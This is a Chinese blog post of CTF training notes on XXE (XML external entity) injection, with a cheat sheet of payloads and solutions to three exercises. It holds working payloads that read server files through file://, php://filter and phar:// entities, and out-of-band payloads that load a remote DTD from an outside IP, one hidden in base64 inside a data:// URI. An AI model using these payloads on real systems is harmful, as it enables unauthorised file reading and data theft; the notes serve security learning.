8月5日xxe漏洞训练

最新推荐文章于 2023-03-08 14:46:50 发布
最新推荐文章于 2023-03-08 14:46:50 发布
阅读量466 收藏
点赞数
分类专栏: 笔记 文章标签: xml
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/slc3315/article/details/107818734
版权

题记:
复制粘贴的一天
今天的重点是xxe漏洞,本地环境需要搭建服务器,可搭建云服务器,做题的重点反而是伪协议
各种常用语句的使用

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE note [
<!ENTITY xxe SYSTEM "file:///flag.php">
]>
<note>
	<info>&xxe;</info>
</note>
//file协议获取flag.php

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE note [
<!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=file:///flag.php">
]>
<note>
	<info>&xxe;</info>
</note>
//php://filter获取flag.php

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE note [
<!ENTITY xxe SYSTEM "phar:///var/www/uploads/cfcd208495d565ef66e7dff9f98764da.jpg">
]>
<note>
	<info>&xxe;</info>
</note>
//phar伪协议获取flag,通常和文件上传、反序列化一起使用

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE note [
<!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=file:./flag.php">
]>
<note>
	<info>&xxe;</info>
</note>
//php://filter获取flag.php

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE note [
<!ENTITY name SYSTEM "http://127.0.0.1/flag.php">
]>
<note>
	<name>&name;</name>
</note>
//http直接访问

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE note [
<!ENTITY % xxe SYSTEM "php://filter/read=convert.base64-encode/resource=file:///flag.php">
<!ENTITY % get SYSTEM "http://118.25.14.40:8200/hack.dtd">
%get;
%text;
%send;
]>
<note>
	<info>&data;</info>
</note>
//远程DTD加php://filter协议

<?xml version="1.0" ?>
<!DOCTYPE test [
	<!ENTITY % a SYSTEM "data://text/plain;base64,PCFFTlRJVFkgJSBiIFNZU1RFTSAnaHR0cDovLzExOC4yNS4xNC40MDo4MjAwL2V4cC5kdGQnPg==">
	%a;
	%b;
]>
	<test>
		&hhh;
	</test>
<!---
	base64编码解密后"<!ENTITY % b SYSTEM 'http://118.25.14.40:8200/exp.dtd'>",意思是通过调用118.25.14.40:8200端口上exp.dtd文件
	exp.dtd文件内容为<!ENTITY % hhh SYSTEM "php://filter/read=convert.base64-encode/resource=/flag">
	总的而言这句xml编码的意思就是首先定义一个变量a,a的内容是执行base64编码内容,解码后,遇到变量b,b为远程执行exp.dtd文件,dtd内容为变量hhh,意思是读取flag文件内容。
	运行顺序是a和b,hhh为dtd中的变量
	-->
//远程DTD加data协议

第一题

在这里插入图片描述
思路:
直接读取
payload:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE note [
<!ENTITY xxe SYSTEM "file:///flag">
]>
<note>
	<info>&xxe;</info>
</note>

答案:
在这里插入图片描述

第二题

题目:
在这里插入图片描述
思路:
输入测试语句

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE note [
<!ENTITY xxe SYSTEM "file:///flag.php">
]>
<note>
	<info>&xxe;</info>
</note>

被过滤,测试大小写、实体编码等绕过仍报错,使用data、php://filter、file等协议绕过
payload

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE note [
<!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=./flag.php">
]>
<note>
	<info>&xxe;</info>
</note>

第三题

题目:
在这里插入图片描述
思路:
输入简单语句进行测试

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE note [
<!ENTITY xxe SYSTEM "file:///flag">
]>
<note>
	<info>&xxe;</info>
</note>

然后使用绕过进行测试
最后使用data伪协议和远程DTD结合的方式解答

<?xml version="1.0" ?>
<!DOCTYPE test [
	<!ENTITY % a SYSTEM "data://text/plain;base64,PCFFTlRJVFkgJSBiIFNZU1RFTSAnaHR0cDovLzExOC4yNS4xNC40MDo4MjAwL2V4cC5kdGQnPg==">
	%a;
	%b;
]>
	<test>
		&hhh;
	</test>

在这里插入图片描述
base64解密

陆小朝
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
前端学习爬坑之路(收藏的博客)
sugang666的博客
12-07 14万+
&lt;!DOCTYPE NETSCAPE-Bookmark-file-1&gt; &lt;!-- This is an automatically generated file. It will be read and overwritten. DO NOT EDIT! --&gt; &lt;META HTTP-EQUIV="Content-Type" CONTENT="t...
day41 XML&XXE&无回显&DTD实体&伪协议&代码审计
wanjia01的博客
12-09 476
知识点:1、XML&XXE-原理&发现&利用&修复等2、XML&XXE-黑盒模式下的发现与利用3、XML&XXE-白盒模式下的审计与利用4、XML&XXE-无回显&伪协议&产生层面#思路点:参考:https://www.cnblogs.com/20175211lyz/p/11413335.html-XXE黑盒发现:1、获取得到Content-Type或数据类型为xml时,尝试进行xml语言payload进行测试。
XXE漏洞详解
weixin_53440207的博客
03-08 663
xxe漏洞详解
WEB-XMLXXE漏洞-伪协议
qq_43306559的博客
12-04 1297
前言 在做unctf时遇到一道web题,是xmlxxe漏洞(Do you like xml),当时没做出来,没反应过来这个知识点,后来经人指点稍微理解了一些关于这个的漏洞,又在判作业中看到了这个知识点,所以决定记录下来 XMLXXE漏洞及伪协议利用 XML是用于标记电子文件使其具有结构性的标记语言,可以用来标记数据、定义数据类型,是一种允许用户对自己的标记语言进行定义的源语言。XML文档结构...
CTF-web 第八部分 常见加密与文件包含 伪协议
iamsongyu的博客
11-05 2124
(1)加密解密等 我们在做题的时候,经常会遇到一些奇怪的加密解密的字符串,这就需要我们能够识别一些比较常用的。        1.base64         这是一个常用的编码,而且原理也十分简单,非常容易得到原内容。 三字节变为四字节 前面补两个0。  所谓Base64,就是说选出64个字符----小写字母a-z、大写字母A-Z、数字0-9、符号"+"、"/"(再加上作为垫字的"=",实...
5、XXE漏洞pdf资料
最新发布
10-15
XXEXML External Entity)漏洞是针对XML解析器的安全漏洞,它发生在XML解析器处理包含外部实体引用的恶意XML输入时。XML(eXtensible Markup Language)是一种用于存储和传输数据的标记语言,它的主要特点是允许...
XXE漏洞详解【内含vulnhub靶场XXE Lab:1详解】
07-30
XXEXML External Entity)漏洞,全称为XML外部实体注入,是针对使用XML解析器的应用程序的一种安全漏洞XML是一种标记语言,常用于数据交换,而外部实体是XML文档的一部分,允许引用外部资源,如文件系统、网络...
第五节 XXE漏洞利用 - 任意文件读取 无回显 -01
09-15
XXE 漏洞利用 - 任意文件读取 无回显 XXEXML External Entity)是一种常见的 Web 应用程序漏洞,攻击者可以通过构造恶意的 XML 文档, trick 服务器将任意文件读取出来,导致敏感信息泄露。在本节中,我们将详细...
105-web漏洞挖掘之XXE漏洞1
08-03
XXE漏洞详解】 XXE,全称为XML External Entity Injection,是XML解析器在处理XML输入时因未能正确配置,允许加载外部实体而导致的安全漏洞。这类漏洞允许攻击者注入恶意的XML外部实体,进而获取敏感信息、执行...
XXE(外部实体注入攻击)
sh0rk的博客
11-24 1万+
XXE什么是XXE利用方法进阶学习防御理论上的防御措施实践有效的防御措施 什么是XXE XXEXML External Entity 即外部实体,从安全角度理解成XML External Entity attack 外部实体注入攻击。由于程序在解析输入的XML数据时,解析了攻击者伪造的外部实体而产生的。 利用方法 file:///C:/Windows/win.ini &lt;?xml versi...
XXE总结
Ciyaso的博客
07-16 739
一、XXE 是什么 XXE(XML External Entity Injection) 全称为 XML 外部实体注入,从名字就能看出来,这是一个注入漏洞,注入的是什么?XML外部实体。(看到这里肯定有人要说:你这不是在废话),固然,其实我这里废话只是想强调我们的利用点是 外部实体 ,也是提醒读者将注意力集中于外部实体中,而不要被 XML 中其他的一些名字相似的东西扰乱了思维(盯好外部实体就行了),如果能注入 外部实体并且成功解析的话,这就会大大拓宽我们 XML 注入的攻击面(这可能就是为什么单独说 而没有
(39.2)【XXE漏洞专题】XXE原理、产生、检测、危害、利用、示例
04-26 3675
【专题】XXE入门
文件包含漏洞之PHP伪协议中的data://的那些事~
Firebasky的博客
06-10 1万+
最近在看文件包含漏洞中的PHP伪协议,发现其中的一个data://方法不能使用?但是自己确实把php.ini里面的allow_url_fopen和allow_url_include打开了。而且在web安全这本书里面也是一模一样的写法? 最后才发现了问题,原来是编码的问题。 实验: //include.php <?php @$file = $_GET['file']; @include($file); ?> 通过data://text/plain协议来进行漏洞利用。 ?file
2020十大安全漏洞介绍
gugonggugong的博客
12-07 3923
OWASP(开放式web应用程序安全项目) Top 10 注入 失效的身份认证 1、定义 身份认证:身份认证最常用于系统登录,形式一般为用户名和密码登录方式,在安全性要求较高的情况下,还有验证码、客户端证书、Ukey等 会话管理:HTTP利用会话机制来实现身份认证,HTTP身份认证的结果往往是获得一个令牌并放在cookie中,之后的身份识别只需读授权令牌,而无需再次进行登录认证 2、原理 开发者通常会建立自定义的认证和会话管理方案。但与身份认证和回话管理相关.
WEB攻防-通用漏洞&XML&XXE&无回显&DTD实体&伪协议&代码审计
m0_65336233的博客
10-15 752
WEB攻防-通用漏洞&XML&XXE&无回显&DTD实体&伪协议&代码审计
XXE进阶—与php伪协议组合利用
afei001
05-09 555
目录 1.XXE外部实体默认支持的协议 2.XXE结合file://协议利用 3.XXE结合php://filter利用读取php文件 4.XXE文件读取EXP 5.XXE结合http://协议利用 5.1 端口探测 5.2 内网端口探测脚本 5.3 Blind XXE反弹数据读取文件 5.4 Blind XXE测试方法 6.XXE结合expect://利用 1.XXE外部实体默认支持的协议 实例代码:xml.php <?php //false,表示允许加..
PHP伪协议总结
热门推荐
大方子
09-06 3万+
0x00php://input //所有测试均allow_url_fopen=On,allow_url_include=On!!! php://input是个可以访问请求的原始数据的只读流。POST请求的情况下,最好使用php://input来代替$HTTP_RAW_POST_DATA,因为它不依赖于特定的php.ini指令。而且,这样的情况下$HTTP_RAW_POST...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值